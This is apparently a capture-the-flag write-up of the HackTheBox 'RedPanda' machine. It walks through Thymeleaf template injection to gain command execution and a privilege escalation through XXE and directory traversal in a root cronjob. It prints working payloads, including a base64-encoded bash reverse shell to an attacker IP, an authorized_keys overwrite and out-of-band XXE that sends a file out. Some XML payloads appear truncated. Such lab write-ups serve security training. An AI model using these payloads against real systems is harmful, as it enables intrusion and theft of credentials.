# HackTheBox - RedPanda ## NMAP ```bash Nmap scan report for 10.10.11.170 Host is up (0.089s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 8080/tcp open http-proxy | fingerprint-strings: | GetRequest: | HTTP/1.1 200 | Content-Type: text/html;charset=UTF-8 | Content-Language: en-US | Date: Sat, 09 Jul 2022 19:01:58 GMT | Connection: close | snip.. |_ Request | http-methods: |_ Supported Methods: GET HEAD OPTIONS |_http-title: Red Panda Search | Made with Spring Boot ``` ## PORT 8080 (HTTP) On port 8080 we see an animation of a fox having a search bar and the title bar tells us that it's made on `Spring Boot` which is a java web framework

I tried some stuff like putting a single quote `'` to see if there's sqli or some command injection

Fuzzing for files with `gobuster` we find an endpoint `/stats`

This shows two potential usernames `damian` and `woodenk`, clicking on either one of them will show us an option to export table and a GET parameter `author`

I tried fuzzing for LFI through a payload list which failed as well

On clicking `Export table` it downloads an xml file

## Foothold But we can't really change the contents of xml so there's no chance of`XXE`, testing for `SSTI` it was vulnerable to `Thymeleaf` which is a template engine for spring boot, testing it with `@{7*7]` https://javamana.com/2021/11/20211121071046977B.html

So we know that it's vulnerable to SSTI, let's try to get RCE and look for any payloads if there are

But this payload didn't worked and gave an error that there are banned characters

```bash ${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()} ``` I tried different fragement exrpessions

And `*` this one worked with our payload ```bash *{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()} ```

For getting a reverse shell I tried bunch of things, encoding the reverse shell with base64 and sending it off but I didn't get a connection back ```bash *{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("echo 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjM2LzIyMjIgMD4mMScK' | base64 -d | bash).getInputStream()).next()} ```

Also tried writing ssh key in `authorized_keys` file but it again gave an error for banned characters ```bash *{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTFEKz1yo3lIWUoYDguQRH534VSoRINR3uWUngQEauC0vIjJuppj2d4nRMMxVOtcQIWuvfYnDef6IbJEBqbyZZw2BOgGdh2Q41kSAKrfoqSbefa7lLtabS9Jt6lo+UY7uEoj6zTsQO4E+b895BNeBQUccfqnY1uyFjFptUR39msM5U8I1BoefbwbI5C7yrZULEZQwkoXKbc1/di/B5btMq2PIbO5f1Za7nwBkaVVv2skmSa0b8K6zkYdIbaaP3HAfkbDiJJXyEJQijqIAYW8CBhGW17KkXAAvmumKjYKFvfa/e5KobAgJT2zKd25Ycu8L8lH3JluyEE4ZHA4XvVSnRSbR4PTL2A6rjE+2bI1MRuF5KYiIMuU3enK7zgYkD2ed3xXgcfqMqPVlE73j6ykKT7mMmA0Pb7uKEHnqMXJFUueVcAso+lYrbvZyRX7hn7hEXOw4uum7lUtZp4iUYSsD/ogAslkvp2WpHRbMW+5rsi+lBAt09lb2aC38yO/jzAy0= arz@blaze' > /home/woodenk/.ssh/authorized_keys").getInputStream()).next()} ```

I searched around for ways to generate java runtime exec payloads and found an encoder for that https://zgao.top/java-lang-runtime-exec-payload-encoding-tool/

```bash *{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjM2LzIyMjIgMD4mMSc=}|{base64,-d}|{bash,-i}").getInputStream()).next()} ```

Stabilizing the shell with `python3`

Since we are in `logs` group, I checked if this group has access anywhere

The reason we are in this group is because the panda search is application is being ran as woodenk as user and with logs group

Checked for `sudo -l` which was asking for a password

I transferred `linpeas` to enumerate the machine

It didn't find anything but `pspy` did find something running in background as root user

## Privilege Escalation In `/opt` , we can see a clean up script removing every jpg and xml files from every publicly writeable directory

We can check the source code of panda search `MainController.java`

In the source code we can see that it's looking for either`damian_creds.xml` or `woodenk_creds.xml` in `/credits` and reading the contents

We can find the password of woodenk user here

But it was useless as we wouldn't be in the logs group also this file isn't important as the one which is running as root through cronjob is credit score `/opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java` First it's going to set arguments from the log file from which it can parse the values and seperate them with `||`

In `IsImage` function it's going to check for a jpg image extension file , will come back to it later

From `getArtist` function it's going to read the meta data of the image specfically the name of Artisit of the image

The `addViewTo` is the function which is vulnerable to XXE because it's using jdom2 version 2.0.6.1 which can be verified from `pom.xml` which contains information about the project

Lastly the `main` function from which the code will start from which wiil read the `uri` part from the log file sperated by `||`, it will check if there's a jpg image file in the uri, if there is , it's going to fetch the artist name of the image file and it's going to send the value to addviewto function which will check if the uri of the image is the similar the one present in the xml file

So to perform the XXE, first we need to make jpg image file point to an artist name and it could be any name so I'll be setting it to `uwu` but we don't have write permissions in the directory where the source code is running so we'll need to perform directory traversal to `/home/woodenk` For the xml file we need to name it `artist` + `creds.xml`, so it's going to be `uwu_creds.xml` also we need to add the location of the image in uri and this needs to be the same as the one in the log file

## Method 1 ```xml ]> damian /../../../../../../../../../../home/woodenk/smooch.jpg &example; 0 0 ``` Transfer both the image and xml file in wendook's home directory

Now to add the uri of this image file we'll perform a directory traversal from `/clients` as the path is hardcoded `/opt/panda_search/src/main/resources/static` + `uri` , here uri is our input where we'll perform directory traversal to our image file location `/home/wendook/smooch.jpg` ```bash echo "200||10.10.14.36||Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0||/../../../../../../../../../../home/woodenk/smooch.jpg" > ./redpanda.log ```

After waiting for some time we'll see the root ssh key being reflected in `uwu` xml attribute which we set

## Method 2 The second way is also with XXE but it's with blind SSRF which is also known as out of band XXE, through which we'll get the root flag by transferring an xml file having an entity to make a request to our server with the entity having the flag contents as a parameter being passed on to our hosted xml having the entities to load the contents

```xml %xxe;]> &xxe; ```

We'll transfer this on the target machine

And host this xml file on our python server

## References - https://javamana.com/2021/11/20211121071046977B.html - https://zgao.top/java-lang-runtime-exec-payload-encoding-tool/ - https://r0yanx.com/tools/java_exec_encode/ - https://security.snyk.io/vuln/SNYK-JAVA-ORGJDOM-1309669 - https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity